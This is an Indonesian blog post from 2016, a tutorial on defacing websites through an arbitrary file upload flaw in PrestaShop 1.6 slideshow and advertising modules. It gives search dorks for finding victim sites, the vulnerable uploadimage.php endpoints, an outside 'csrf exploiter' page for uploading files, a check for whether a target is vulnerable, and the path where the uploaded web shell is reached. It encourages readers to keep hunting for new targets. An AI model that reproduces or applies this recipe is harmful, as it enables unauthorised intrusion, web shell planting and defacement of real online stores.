Sabtu, 20 Agustus 2016

Tutorial Deface Menggunakan PrestaShop - Responsive Prestashop 1.6 Arbitrary File Upload



Dork :  


inurl:"/modules/columnadverts/"


inurl:"/modules/homepageadvertise/"


inurl:"/modules/productpageadverts/"


inurl:"/modules/simpleslideshow/"


inurl:"/modules/homepageadvertise2/"


inurl:"/modules/vtemslideshow/"



Gak VULN ? cari target lain lah :v dork nya kembanginnn ... bisa tambah in site:

Exploit :

/modules/columnadverts/uploadimage.php



/modules/homepageadvertise/uploadimage.php



/modules/productpageadverts/uploadimage.php



/modules/simpleslideshow/uploadimage.php



/modules/homepageadvertise2/uploadimage.php



/modules/vtemslideshow/uploadimage.php


csrf exploiter pretashop = http://m2d.asia/csrfpretashop/

ciri ciri vuln ada tulisan error kalo User Not Login engga vuln :D

akses shellnya = targetlu/modules/namapretashopnya/slides/namashellu.php
























Load disqus comments

0 komentar

Comments
0 Comments